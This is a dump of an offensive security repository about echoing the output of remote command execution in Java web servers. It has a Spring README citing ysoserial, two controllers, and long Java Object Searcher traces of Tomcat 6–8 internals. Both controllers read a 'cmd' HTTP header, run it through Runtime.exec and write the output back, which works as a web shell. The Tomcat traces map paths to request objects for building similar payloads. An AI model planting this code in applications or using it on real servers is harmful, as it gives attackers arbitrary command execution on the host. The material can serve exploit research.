https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Resin/img/003.png
--------------------------------------------------------------------------------
/Spring/README.md:
--------------------------------------------------------------------------------
1 | # Spring 回显
2 |
3 | ## 依赖
4 | * Spring-web.jar
5 |
6 | ## 效果
7 | 
8 |
9 | ## 参考
10 | * [https://github.com/j1anFen/ysoserial_echo](https://github.com/j1anFen/ysoserial_echo)
11 | * [https://stackoverflow.com/questions/592123/is-there-a-static-way-to-get-the-httpservletrequest-of-the-current-request](https://stackoverflow.com/questions/592123/is-there-a-static-way-to-get-the-httpservletrequest-of-the-current-request)
12 |
--------------------------------------------------------------------------------
/Spring/code/SpringMVCTestController.java:
--------------------------------------------------------------------------------
1 | package com.management.controller;
2 |
3 | import com.management.bean.User;
4 | import org.springframework.stereotype.Controller;
5 | import org.springframework.web.bind.annotation.RequestMapping;
6 | import org.springframework.web.bind.annotation.RequestMethod;
7 | import org.springframework.web.bind.annotation.ResponseBody;
8 | import java.io.*;
9 |
10 | @Controller
11 | public class SpringMVCTestController {
12 |
13 | @ResponseBody
14 | @RequestMapping(value="/echo", method = RequestMethod.GET)
15 | public User Test() throws IOException {
16 |
17 | org.springframework.web.context.request.RequestAttributes requestAttributes = org.springframework.web.context.request.RequestContextHolder.getRequestAttributes();
18 | javax.servlet.http.HttpServletRequest httprequest = ((org.springframework.web.context.request.ServletRequestAttributes) requestAttributes).getRequest();
19 | javax.servlet.http.HttpServletResponse httpresponse = ((org.springframework.web.context.request.ServletRequestAttributes) requestAttributes).getResponse();
20 |
21 | String cmd = httprequest.getHeader("cmd");
22 | if(cmd != null && !cmd.isEmpty()){
23 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
24 | httpresponse.getWriter().println(res);
25 | }
26 |
27 | return new User();
28 | }
29 | }
30 |
--------------------------------------------------------------------------------
/Spring/code/SpringWebFlowTestController.java:
--------------------------------------------------------------------------------
1 | package com.pizza;
2 |
3 | import org.springframework.stereotype.Controller;
4 | import org.springframework.web.bind.annotation.GetMapping;
5 | import java.io.IOException;
6 |
7 | @Controller
8 | public class SpringWebFlowTestController {
9 |
10 | @GetMapping("/")
11 | public String redirectToFlow() {
12 | return "redirect:/pizza";
13 | }
14 |
15 | @GetMapping("/echo")
16 | public String test() throws IOException {
17 |
18 | //自己搭建的环境测试不成功,ExternalContextHolder.getExternalContext() 返回 null,可能是环境配置的不对
19 | //依赖:spring-webflow.jar
20 | //参考:
21 | // 1. https://www.00theway.org/2020/01/04/apereo-cas-rce/
22 | // 2. https://www.programcreek.com/java-api-examples/?class=org.springframework.webflow.context.ExternalContextHolder&method=getExternalContext
23 |
24 | org.springframework.webflow.context.servlet.ServletExternalContext servletExternalContext = (org.springframework.webflow.context.servlet.ServletExternalContext) org.springframework.webflow.context.ExternalContextHolder.getExternalContext();
25 | javax.servlet.http.HttpServletRequest request = (javax.servlet.http.HttpServletRequest) servletExternalContext.getNativeRequest();
26 | javax.servlet.http.HttpServletResponse response = (javax.servlet.http.HttpServletResponse) servletExternalContext.getNativeResponse();
27 |
28 | String cmd = request.getHeader("cmd");
29 | if(cmd != null && !cmd.isEmpty()){
30 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
31 | response.getWriter().println(res);
32 | }
33 |
34 | return "test";
35 | }
36 | }
37 |
--------------------------------------------------------------------------------
/Spring/imgs/20200621-001.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Spring/imgs/20200621-001.png
--------------------------------------------------------------------------------
/Tomcat/Java Object Searcher search result/tomat 6.0.53 result.txt:
--------------------------------------------------------------------------------
1 | #############################################################
2 | Java Object Searcher v0.01
3 | author: c0ny1
4 | github: http://github.com/c0ny1/java-object-searcher
5 | #############################################################
6 |
7 |
8 | TargetObject = {java.lang.Thread}
9 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Worker}
10 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
11 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
12 | ---> global = {org.apache.coyote.RequestGroupInfo}
13 |
14 |
15 | TargetObject = {java.lang.Thread}
16 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Worker}
17 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
18 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
19 | ---> global = {org.apache.coyote.RequestGroupInfo}
20 | ---> processors = {class java.util.ArrayList}
21 | ---> [0] = {org.apache.coyote.RequestInfo}
22 |
23 |
24 | TargetObject = {java.lang.Thread}
25 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Worker}
26 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
27 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
28 | ---> global = {org.apache.coyote.RequestGroupInfo}
29 | ---> processors = {class java.util.ArrayList}
30 | ---> [0] = {org.apache.coyote.RequestInfo}
31 | ---> req = {org.apache.coyote.Request}
32 |
33 |
34 | TargetObject = {java.lang.Thread}
35 | ---> group = {java.lang.ThreadGroup}
36 | ---> threads = {class [Ljava.lang.Thread;}
37 | ---> [6] = {org.apache.tomcat.util.threads.ThreadWithAttributes}
38 | ---> target = {org.apache.tomcat.util.threads.ThreadPool$ControlRunnable}
39 | ---> toRun = {org.apache.jk.common.ChannelSocket$SocketAcceptor}
40 | ---> wajp = {org.apache.jk.common.ChannelSocket}
41 | ---> global = {org.apache.coyote.RequestGroupInfo}
42 |
43 |
44 | TargetObject = {java.lang.Thread}
45 | ---> group = {java.lang.ThreadGroup}
46 | ---> threads = {class [Ljava.lang.Thread;}
47 | ---> [6] = {org.apache.tomcat.util.threads.ThreadWithAttributes}
48 | ---> target = {org.apache.tomcat.util.threads.ThreadPool$ControlRunnable}
49 | ---> toRun = {org.apache.jk.common.ChannelSocket$SocketAcceptor}
50 | ---> wajp = {org.apache.jk.common.ChannelSocket}
51 | ---> next = {org.apache.jk.common.HandlerRequest}
52 |
53 |
54 | TargetObject = {java.lang.Thread}
55 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Worker}
56 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
57 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
58 | ---> global = {org.apache.coyote.RequestGroupInfo}
59 | ---> processors = {class java.util.ArrayList}
60 | ---> [0] = {org.apache.coyote.RequestInfo}
61 | ---> req = {org.apache.coyote.Request}
62 | ---> notes = {class [Ljava.lang.Object;}
63 | ---> [1] = {org.apache.catalina.connector.Request}
64 |
65 |
66 | TargetObject = {java.lang.Thread}
67 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Worker}
68 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
69 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
70 | ---> global = {org.apache.coyote.RequestGroupInfo}
71 | ---> processors = {class java.util.ArrayList}
72 | ---> [0] = {org.apache.coyote.RequestInfo}
73 | ---> req = {org.apache.coyote.Request}
74 | ---> notes = {class [Ljava.lang.Object;}
75 | ---> [1] = {org.apache.catalina.connector.Request}
76 | ---> facade = {org.apache.catalina.connector.RequestFacade}
77 |
78 |
79 |
--------------------------------------------------------------------------------
/Tomcat/Java Object Searcher search result/tomcat 7.0.34 result.txt:
--------------------------------------------------------------------------------
1 | #############################################################
2 | Java Object Searcher v0.01
3 | author: c0ny1
4 | github: http://github.com/c0ny1/java-object-searcher
5 | #############################################################
6 |
7 |
8 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
9 | ---> group = {java.lang.ThreadGroup}
10 | ---> threads = {class [Ljava.lang.Thread;}
11 | ---> [3] = {java.lang.Thread}
12 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Acceptor}
13 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
14 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
15 | ---> global = {org.apache.coyote.RequestGroupInfo}
16 |
17 |
18 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
19 | ---> group = {java.lang.ThreadGroup}
20 | ---> threads = {class [Ljava.lang.Thread;}
21 | ---> [5] = {java.lang.Thread}
22 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Acceptor}
23 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
24 | ---> handler = {org.apache.coyote.ajp.AjpProtocol$AjpConnectionHandler}
25 | ---> global = {org.apache.coyote.RequestGroupInfo}
26 |
27 |
28 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
29 | ---> group = {java.lang.ThreadGroup}
30 | ---> threads = {class [Ljava.lang.Thread;}
31 | ---> [3] = {java.lang.Thread}
32 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Acceptor}
33 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
34 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
35 | ---> global = {org.apache.coyote.RequestGroupInfo}
36 | ---> processors = {java.util.ArrayList}
37 | ---> [0] = {org.apache.coyote.RequestInfo}
38 |
39 |
40 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
41 | ---> group = {java.lang.ThreadGroup}
42 | ---> threads = {class [Ljava.lang.Thread;}
43 | ---> [2] = {java.lang.Thread}
44 | ---> target = {org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor}
45 | ---> this$0 = {org.apache.catalina.core.StandardEngine}
46 | ---> children = {java.util.HashMap}
47 | ---> [localhost] = {org.apache.catalina.core.StandardHost}
48 | ---> pipeline = {org.apache.catalina.core.StandardPipeline}
49 | ---> first = {org.apache.catalina.valves.AccessLogValve}
50 | ---> logElements = {class [Lorg.apache.catalina.valves.AccessLogValve$AccessLogElement;}
51 | ---> [9] = {org.apache.catalina.valves.AccessLogValve$RequestElement}
52 |
53 |
54 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
55 | ---> group = {java.lang.ThreadGroup}
56 | ---> threads = {class [Ljava.lang.Thread;}
57 | ---> [3] = {java.lang.Thread}
58 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Acceptor}
59 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
60 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
61 | ---> global = {org.apache.coyote.RequestGroupInfo}
62 | ---> processors = {java.util.ArrayList}
63 | ---> [0] = {org.apache.coyote.RequestInfo}
64 | ---> req = {org.apache.coyote.Request}
65 |
66 |
67 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
68 | ---> group = {java.lang.ThreadGroup}
69 | ---> threads = {class [Ljava.lang.Thread;}
70 | ---> [3] = {java.lang.Thread}
71 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Acceptor}
72 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
73 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
74 | ---> global = {org.apache.coyote.RequestGroupInfo}
75 | ---> processors = {java.util.ArrayList}
76 | ---> [0] = {org.apache.coyote.RequestInfo}
77 | ---> req = {org.apache.coyote.Request}
78 | ---> notes = {class [Ljava.lang.Object;}
79 | ---> [1] = {org.apache.catalina.connector.Request}
80 |
81 |
82 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
83 | ---> group = {java.lang.ThreadGroup}
84 | ---> threads = {class [Ljava.lang.Thread;}
85 | ---> [3] = {java.lang.Thread}
86 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Acceptor}
87 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
88 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
89 | ---> global = {org.apache.coyote.RequestGroupInfo}
90 | ---> processors = {java.util.ArrayList}
91 | ---> [0] = {org.apache.coyote.RequestInfo}
92 | ---> req = {org.apache.coyote.Request}
93 | ---> notes = {class [Ljava.lang.Object;}
94 | ---> [1] = {org.apache.catalina.connector.Request}
95 | ---> facade = {org.apache.catalina.connector.RequestFacade}
96 |
97 |
98 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
99 | ---> group = {java.lang.ThreadGroup}
100 | ---> threads = {class [Ljava.lang.Thread;}
101 | ---> [3] = {java.lang.Thread}
102 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Acceptor}
103 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
104 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
105 | ---> global = {org.apache.coyote.RequestGroupInfo}
106 | ---> processors = {java.util.ArrayList}
107 | ---> [0] = {org.apache.coyote.RequestInfo}
108 | ---> req = {org.apache.coyote.Request}
109 | ---> notes = {class [Ljava.lang.Object;}
110 | ---> [1] = {org.apache.catalina.connector.Request}
111 | ---> specialAttributes = {java.util.Map}
112 | ---> [org.apache.catalina.core.DISPATCHER_TYPE] = {org.apache.catalina.connector.Request$1}
113 |
114 |
115 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
116 | ---> group = {java.lang.ThreadGroup}
117 | ---> threads = {class [Ljava.lang.Thread;}
118 | ---> [3] = {java.lang.Thread}
119 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Acceptor}
120 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
121 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
122 | ---> global = {org.apache.coyote.RequestGroupInfo}
123 | ---> processors = {java.util.ArrayList}
124 | ---> [0] = {org.apache.coyote.RequestInfo}
125 | ---> req = {org.apache.coyote.Request}
126 | ---> notes = {class [Ljava.lang.Object;}
127 | ---> [1] = {org.apache.catalina.connector.Request}
128 | ---> specialAttributes = {java.util.Map}
129 | ---> [org.apache.catalina.ASYNC_SUPPORTED] = {org.apache.catalina.connector.Request$3}
130 |
131 |
132 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
133 | ---> group = {java.lang.ThreadGroup}
134 | ---> threads = {class [Ljava.lang.Thread;}
135 | ---> [3] = {java.lang.Thread}
136 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Acceptor}
137 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
138 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
139 | ---> global = {org.apache.coyote.RequestGroupInfo}
140 | ---> processors = {java.util.ArrayList}
141 | ---> [0] = {org.apache.coyote.RequestInfo}
142 | ---> req = {org.apache.coyote.Request}
143 | ---> notes = {class [Ljava.lang.Object;}
144 | ---> [1] = {org.apache.catalina.connector.Request}
145 | ---> specialAttributes = {java.util.Map}
146 | ---> [org.apache.catalina.parameter_parse_failed] = {org.apache.catalina.connector.Request$5}
147 |
148 |
149 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
150 | ---> group = {java.lang.ThreadGroup}
151 | ---> threads = {class [Ljava.lang.Thread;}
152 | ---> [3] = {java.lang.Thread}
153 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Acceptor}
154 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
155 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
156 | ---> global = {org.apache.coyote.RequestGroupInfo}
157 | ---> processors = {java.util.ArrayList}
158 | ---> [0] = {org.apache.coyote.RequestInfo}
159 | ---> req = {org.apache.coyote.Request}
160 | ---> notes = {class [Ljava.lang.Object;}
161 | ---> [1] = {org.apache.catalina.connector.Request}
162 | ---> specialAttributes = {java.util.Map}
163 | ---> [org.apache.catalina.core.DISPATCHER_REQUEST_PATH] = {org.apache.catalina.connector.Request$2}
164 |
165 |
166 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
167 | ---> group = {java.lang.ThreadGroup}
168 | ---> threads = {class [Ljava.lang.Thread;}
169 | ---> [3] = {java.lang.Thread}
170 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Acceptor}
171 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
172 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
173 | ---> global = {org.apache.coyote.RequestGroupInfo}
174 | ---> processors = {java.util.ArrayList}
175 | ---> [0] = {org.apache.coyote.RequestInfo}
176 | ---> req = {org.apache.coyote.Request}
177 | ---> notes = {class [Ljava.lang.Object;}
178 | ---> [1] = {org.apache.catalina.connector.Request}
179 | ---> specialAttributes = {java.util.Map}
180 | ---> [org.apache.catalina.realm.GSS_CREDENTIAL] = {org.apache.catalina.connector.Request$4}
181 |
182 |
183 |
--------------------------------------------------------------------------------
/Tomcat/Java Object Searcher search result/tomcat 7.0.96 result.txt:
--------------------------------------------------------------------------------
1 | #############################################################
2 | Java Object Searcher v0.01
3 | author: c0ny1
4 | github: http://github.com/c0ny1/java-object-searcher
5 | #############################################################
6 |
7 |
8 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
9 | ---> group = {java.lang.ThreadGroup}
10 | ---> threads = {class [Ljava.lang.Thread;}
11 | ---> [13] = {java.lang.Thread}
12 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
13 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
14 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
15 | ---> global = {org.apache.coyote.RequestGroupInfo}
16 |
17 |
18 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
19 | ---> group = {java.lang.ThreadGroup}
20 | ---> threads = {class [Ljava.lang.Thread;}
21 | ---> [27] = {java.lang.Thread}
22 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Acceptor}
23 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
24 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
25 | ---> global = {org.apache.coyote.RequestGroupInfo}
26 |
27 |
28 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
29 | ---> group = {java.lang.ThreadGroup}
30 | ---> threads = {class [Ljava.lang.Thread;}
31 | ---> [39] = {java.lang.Thread}
32 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
33 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
34 | ---> handler = {org.apache.coyote.ajp.AjpAprProtocol$AjpConnectionHandler}
35 | ---> global = {org.apache.coyote.RequestGroupInfo}
36 |
37 |
38 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
39 | ---> group = {java.lang.ThreadGroup}
40 | ---> threads = {class [Ljava.lang.Thread;}
41 | ---> [13] = {java.lang.Thread}
42 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
43 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
44 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
45 | ---> global = {org.apache.coyote.RequestGroupInfo}
46 | ---> processors = {java.util.ArrayList}
47 | ---> [0] = {org.apache.coyote.RequestInfo}
48 |
49 |
50 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
51 | ---> group = {java.lang.ThreadGroup}
52 | ---> threads = {class [Ljava.lang.Thread;}
53 | ---> [2] = {java.lang.Thread}
54 | ---> target = {org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor}
55 | ---> this$0 = {org.apache.catalina.core.StandardEngine}
56 | ---> children = {java.util.HashMap}
57 | ---> [localhost] = {org.apache.catalina.core.StandardHost}
58 | ---> pipeline = {org.apache.catalina.core.StandardPipeline}
59 | ---> first = {org.apache.catalina.valves.AccessLogValve}
60 | ---> logElements = {class [Lorg.apache.catalina.valves.AccessLogValve$AccessLogElement;}
61 | ---> [9] = {org.apache.catalina.valves.AccessLogValve$RequestElement}
62 |
63 |
64 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
65 | ---> group = {java.lang.ThreadGroup}
66 | ---> threads = {class [Ljava.lang.Thread;}
67 | ---> [13] = {java.lang.Thread}
68 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
69 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
70 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
71 | ---> global = {org.apache.coyote.RequestGroupInfo}
72 | ---> processors = {java.util.ArrayList}
73 | ---> [0] = {org.apache.coyote.RequestInfo}
74 | ---> req = {org.apache.coyote.Request}
75 |
76 |
77 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
78 | ---> group = {java.lang.ThreadGroup}
79 | ---> threads = {class [Ljava.lang.Thread;}
80 | ---> [13] = {java.lang.Thread}
81 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
82 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
83 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
84 | ---> global = {org.apache.coyote.RequestGroupInfo}
85 | ---> processors = {java.util.ArrayList}
86 | ---> [0] = {org.apache.coyote.RequestInfo}
87 | ---> req = {org.apache.coyote.Request}
88 | ---> notes = {class [Ljava.lang.Object;}
89 | ---> [1] = {org.apache.catalina.connector.Request}
90 |
91 |
92 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
93 | ---> group = {java.lang.ThreadGroup}
94 | ---> threads = {class [Ljava.lang.Thread;}
95 | ---> [13] = {java.lang.Thread}
96 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
97 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
98 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
99 | ---> global = {org.apache.coyote.RequestGroupInfo}
100 | ---> processors = {java.util.ArrayList}
101 | ---> [0] = {org.apache.coyote.RequestInfo}
102 | ---> req = {org.apache.coyote.Request}
103 | ---> notes = {class [Ljava.lang.Object;}
104 | ---> [1] = {org.apache.catalina.connector.Request}
105 | ---> facade = {org.apache.catalina.connector.RequestFacade}
106 |
107 |
108 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
109 | ---> group = {java.lang.ThreadGroup}
110 | ---> threads = {class [Ljava.lang.Thread;}
111 | ---> [13] = {java.lang.Thread}
112 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
113 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
114 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
115 | ---> global = {org.apache.coyote.RequestGroupInfo}
116 | ---> processors = {java.util.ArrayList}
117 | ---> [0] = {org.apache.coyote.RequestInfo}
118 | ---> req = {org.apache.coyote.Request}
119 | ---> notes = {class [Ljava.lang.Object;}
120 | ---> [1] = {org.apache.catalina.connector.Request}
121 | ---> specialAttributes = {java.util.Map}
122 | ---> [org.apache.catalina.parameter_parse_failed_reason] = {org.apache.catalina.connector.Request$6}
123 |
124 |
125 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
126 | ---> group = {java.lang.ThreadGroup}
127 | ---> threads = {class [Ljava.lang.Thread;}
128 | ---> [13] = {java.lang.Thread}
129 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
130 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
131 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
132 | ---> global = {org.apache.coyote.RequestGroupInfo}
133 | ---> processors = {java.util.ArrayList}
134 | ---> [0] = {org.apache.coyote.RequestInfo}
135 | ---> req = {org.apache.coyote.Request}
136 | ---> notes = {class [Ljava.lang.Object;}
137 | ---> [1] = {org.apache.catalina.connector.Request}
138 | ---> specialAttributes = {java.util.Map}
139 | ---> [org.apache.catalina.core.DISPATCHER_TYPE] = {org.apache.catalina.connector.Request$1}
140 |
141 |
142 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
143 | ---> group = {java.lang.ThreadGroup}
144 | ---> threads = {class [Ljava.lang.Thread;}
145 | ---> [13] = {java.lang.Thread}
146 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
147 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
148 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
149 | ---> global = {org.apache.coyote.RequestGroupInfo}
150 | ---> processors = {java.util.ArrayList}
151 | ---> [0] = {org.apache.coyote.RequestInfo}
152 | ---> req = {org.apache.coyote.Request}
153 | ---> notes = {class [Ljava.lang.Object;}
154 | ---> [1] = {org.apache.catalina.connector.Request}
155 | ---> specialAttributes = {java.util.Map}
156 | ---> [org.apache.catalina.ASYNC_SUPPORTED] = {org.apache.catalina.connector.Request$3}
157 |
158 |
159 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
160 | ---> group = {java.lang.ThreadGroup}
161 | ---> threads = {class [Ljava.lang.Thread;}
162 | ---> [13] = {java.lang.Thread}
163 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
164 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
165 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
166 | ---> global = {org.apache.coyote.RequestGroupInfo}
167 | ---> processors = {java.util.ArrayList}
168 | ---> [0] = {org.apache.coyote.RequestInfo}
169 | ---> req = {org.apache.coyote.Request}
170 | ---> notes = {class [Ljava.lang.Object;}
171 | ---> [1] = {org.apache.catalina.connector.Request}
172 | ---> specialAttributes = {java.util.Map}
173 | ---> [org.apache.catalina.parameter_parse_failed] = {org.apache.catalina.connector.Request$5}
174 |
175 |
176 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
177 | ---> group = {java.lang.ThreadGroup}
178 | ---> threads = {class [Ljava.lang.Thread;}
179 | ---> [13] = {java.lang.Thread}
180 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
181 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
182 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
183 | ---> global = {org.apache.coyote.RequestGroupInfo}
184 | ---> processors = {java.util.ArrayList}
185 | ---> [0] = {org.apache.coyote.RequestInfo}
186 | ---> req = {org.apache.coyote.Request}
187 | ---> notes = {class [Ljava.lang.Object;}
188 | ---> [1] = {org.apache.catalina.connector.Request}
189 | ---> specialAttributes = {java.util.Map}
190 | ---> [org.apache.catalina.core.DISPATCHER_REQUEST_PATH] = {org.apache.catalina.connector.Request$2}
191 |
192 |
193 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
194 | ---> group = {java.lang.ThreadGroup}
195 | ---> threads = {class [Ljava.lang.Thread;}
196 | ---> [13] = {java.lang.Thread}
197 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
198 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
199 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
200 | ---> global = {org.apache.coyote.RequestGroupInfo}
201 | ---> processors = {java.util.ArrayList}
202 | ---> [0] = {org.apache.coyote.RequestInfo}
203 | ---> req = {org.apache.coyote.Request}
204 | ---> notes = {class [Ljava.lang.Object;}
205 | ---> [1] = {org.apache.catalina.connector.Request}
206 | ---> specialAttributes = {java.util.Map}
207 | ---> [org.apache.catalina.realm.GSS_CREDENTIAL] = {org.apache.catalina.connector.Request$4}
208 |
209 |
210 |
--------------------------------------------------------------------------------
/Tomcat/Java Object Searcher search result/tomcat 8.0.48 result.txt:
--------------------------------------------------------------------------------
1 | #############################################################
2 | Java Object Searcher v0.01
3 | author: c0ny1
4 | github: http://github.com/c0ny1/java-object-searcher
5 | #############################################################
6 |
7 |
8 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
9 | ---> group = {java.lang.ThreadGroup}
10 | ---> threads = {class [Ljava.lang.Thread;}
11 | ---> [14] = {java.lang.Thread}
12 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
13 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
14 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
15 | ---> global = {org.apache.coyote.RequestGroupInfo}
16 |
17 |
18 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
19 | ---> group = {java.lang.ThreadGroup}
20 | ---> threads = {class [Ljava.lang.Thread;}
21 | ---> [28] = {java.lang.Thread}
22 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
23 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
24 | ---> handler = {org.apache.coyote.ajp.AjpAprProtocol$AjpConnectionHandler}
25 | ---> global = {org.apache.coyote.RequestGroupInfo}
26 |
27 |
28 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
29 | ---> group = {java.lang.ThreadGroup}
30 | ---> threads = {class [Ljava.lang.Thread;}
31 | ---> [14] = {java.lang.Thread}
32 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
33 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
34 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
35 | ---> global = {org.apache.coyote.RequestGroupInfo}
36 | ---> processors = {java.util.ArrayList}
37 | ---> [0] = {org.apache.coyote.RequestInfo}
38 |
39 |
40 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
41 | ---> group = {java.lang.ThreadGroup}
42 | ---> threads = {class [Ljava.lang.Thread;}
43 | ---> [14] = {java.lang.Thread}
